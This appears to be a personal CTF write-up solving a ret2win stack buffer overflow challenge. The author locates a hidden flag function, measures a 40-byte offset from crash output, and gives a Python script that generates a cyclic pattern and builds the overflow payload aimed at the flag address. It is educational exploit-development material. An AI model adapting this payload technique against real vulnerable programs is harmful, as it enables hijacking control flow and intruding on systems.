![bc05f00ecc2353a02fac35b2169924aa.png](e55111680a3849cbb9684b09f6587aa7.png)
Same setup as Pwn intended 0x2, but this time the function we want to return into is not as obvious from main.
Start by analyzing the binary
![504f53d5778b6ebe7b198aa1d8e5d7ec.png](0f2ac7275d564063a901ecc671cde229.png)
![071fad63a5963f0256d02e9be7a21d24.png](c5f0d916ab624f4a988a6e2f882db574.png)
Nothing interesting in main, but the symbol list shows a sym.flag function. Let's check that out.
![8a100fa908be8a2b53e21367ba9350ac.png](38211eb1a26b49e08d52b72b9c954fcb.png)
That's what we want: the flag function starts at 0x004011ce, so that is where the overwritten return address should point.
Same as 0x2: find the padding by sending inputs of increasing length from python and reading the resulting crash in dmesg.
![f974eca91c6b6ad05ab065407f95dae5.png](b57aba59443a41ee8f336b731bcfa792.png)
![d57c22f9604986264b23cbacca662370.png](d9b2c81dd4614b6094c7e393c8e12f92.png)
The input starts overwriting the saved return address at byte 41, so 40 bytes of padding put our address exactly on the return slot.
Script:
![3c71b8e7f3e03b1a80a3cc7a4f06484f.png](1b08c7a7883548cfaa16874cbdc3b5d2.png)
![53dd3ef97673c5dd26944527dda1d0ff.png](f5fc1e2c0cc740abaddce72adf137da2.png)
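The two steps above (measuring the padding, then placing the flag address) as an added, runnable example. This is not the author's script from the screenshots: instead of growing a run of "A"s until the crash moves, it uses a de Bruijn (cyclic) pattern, which is the general form of the same measurement, so the bytes that land in the return slot identify the offset in one run. The crash value `0x6161616c6161616b` is a constructed sample standing in for what dmesg would print; the padding (40) and target (0x004011ce) are the values from this writeup.

```python
import itertools
import struct

ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: str, n: int):
    """Lazily yield the de Bruijn sequence B(k, n): every n-char window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern; same output shape as pwntools' cyclic()."""
    return "".join(itertools.islice(de_bruijn(ALPHABET, n), length)).encode()


def cyclic_find(crash_value: int, width: int = 8, n: int = 4) -> int:
    """Map a register/return-slot value seen in the crash back to its pattern offset.

    The CPU reads the overwritten slot little-endian, so the integer dmesg shows
    is the pattern bytes reversed; re-pack it as little-endian and search.
    Returns -1 if the bytes are not part of the pattern (crash came from elsewhere).
    """
    needle = crash_value.to_bytes(width, "little")
    haystack = cyclic(4096, n)  # long enough for any realistic stack buffer
    return haystack.find(needle)


def build_payload(padding: int, target: int) -> bytes:
    """Padding up to the saved return address, then the target as a 64-bit LE pointer."""
    return b"A" * padding + struct.pack("<Q", target)


if __name__ == "__main__":
    # Constructed sample: value that ended up in the return slot after sending cyclic(100).
    crash_value = 0x6161616C6161616B
    offset = cyclic_find(crash_value)
    print(f"return address overwritten at offset {offset}")  # 40, as in the writeup

    payload = build_payload(offset, 0x004011CE)  # sym.flag from the disassembly
    print(payload.hex())
    print(f"total length {len(payload)} bytes")
```

The offset lookup works for a 4-byte value too (pass `width=4`), which is what you would use on a 32-bit target or when dmesg only shows the low dword; a `-1` result means the bytes in the crash were not from the pattern, i.e. the overwrite is not a clean return-address clobber and needs another look in the debugger.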
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #exploit_development #buffer_overflow #scripting
Related: